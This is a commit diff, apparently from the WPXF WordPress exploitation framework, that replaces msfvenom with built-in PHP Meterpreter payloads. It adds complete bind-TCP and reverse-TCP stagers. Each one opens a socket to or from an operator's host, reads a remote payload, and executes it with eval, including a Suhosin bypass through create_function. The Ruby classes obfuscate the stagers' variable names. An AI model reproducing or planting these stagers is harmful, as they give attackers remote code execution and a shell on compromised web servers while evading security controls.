Remove use of msfvenom in favour of WPXF payload generation

Author: rastating

data/php/meterpreter_bind_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_bind_tcp_ipv6.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_reverse_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

payloads/meterpreter_bind_tcp.rb

@@ -5,12 +5,10 @@ module Wpxf::Payloads
   class MeterpreterBindTcp < Wpxf::Payload
     include Wpxf
     include Wpxf::Options
-    include Wpxf::Payloads::MsfVenomHelper
 
     def initialize
       super
 
-      register_msfvenom_options
       register_options([
         StringOption.new(
           name: 'rhost',
@@ -45,19 +43,22 @@ def use_ipv6
     end
 
     def raw
-      msfvenom_payload
-    end
-
-    def msfvenom_payload_name
       if use_ipv6
-        'php/meterpreter/bind_tcp_ipv6'
+        DataFile.new('php', 'meterpreter_bind_tcp_ipv6.php').php_content
       else
-        'php/meterpreter/bind_tcp'
+        DataFile.new('php', 'meterpreter_bind_tcp.php').php_content
       end
     end
 
-    def prepare(mod)
-      generate_msfvenom_payload(mod, msfvenom_payload_name, "RHOST=#{host}", "LPORT=#{lport}")
+    def constants
+      {
+        'ip'   => host,
+        'port' => lport
+      }
+    end
+
+    def obfuscated_variables
+      super + %w[ip port srvsock s s_type res b a len suhosin_bypass]
     end
   end
 end

payloads/meterpreter_reverse_tcp.rb

@@ -5,12 +5,10 @@ module Wpxf::Payloads
   class MeterpreterReverseTcp < Wpxf::Payload
     include Wpxf
     include Wpxf::Options
-    include Wpxf::Payloads::MsfVenomHelper
 
     def initialize
       super
 
-      register_msfvenom_options
       register_options([
         StringOption.new(
           name: 'lhost',
@@ -35,11 +33,18 @@ def lport
     end
 
     def raw
-      msfvenom_payload
+      DataFile.new('php', 'meterpreter_reverse_tcp.php').php_content
     end
 
-    def prepare(mod)
-      generate_msfvenom_payload(mod, 'php/meterpreter/reverse_tcp', "LHOST=#{host}", "LPORT=#{lport}")
+    def constants
+      {
+        'ip'   => host,
+        'port' => lport
+      }
+    end
+
+    def obfuscated_variables
+      super + %w[ip port f s s_type res len a b suhosin_bypass]
     end
   end
 end